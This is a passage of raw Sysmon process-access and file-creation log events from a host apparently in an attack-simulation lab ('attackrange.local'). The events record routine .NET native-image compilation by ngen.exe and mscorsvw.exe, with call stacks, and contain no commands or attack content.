scorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:12.728{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9214-6005-B203-00000000A301}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.712{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9214-6005-B203-00000000A301}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:12.712{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9214-6005-B203-00000000A301}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:12.650{59A5CD1D-9214-6005-B103-00000000A301}4548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11c4-0\Microsoft.VisualBasic.Compatibility.Data.dll2021-01-18 13:50:12.650 10341000x80000000000000007988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:12.369{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9214-6005-B103-00000000A301}4548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.353{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9214-6005-B103-00000000A301}4548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:12.353{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9214-6005-B103-00000000A301}4548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:12.275{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9214-6005-B003-00000000A301}3812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.275{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9214-6005-B003-00000000A301}3812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:12.275{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9214-6005-B003-00000000A301}3812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:12.181{59A5CD1D-9213-6005-AF03-00000000A301}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11c8-0\Microsoft.VisualBasic.Compatibility.dll2021-01-18 13:50:12.181 10341000x80000000000000008038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.947{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-C103-00000000A301}3728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.931{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-C103-00000000A301}3728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.931{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-C103-00000000A301}3728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.806{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-C003-00000000A301}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.791{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-C003-00000000A301}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.791{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-C003-00000000A301}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.572{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-BF03-00000000A301}812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.556{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-BF03-00000000A301}812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.556{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-BF03-00000000A301}812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.494{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-BE03-00000000A301}740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.478{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-BE03-00000000A301}740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.478{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-BE03-00000000A301}740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:13.431{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-BD03-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 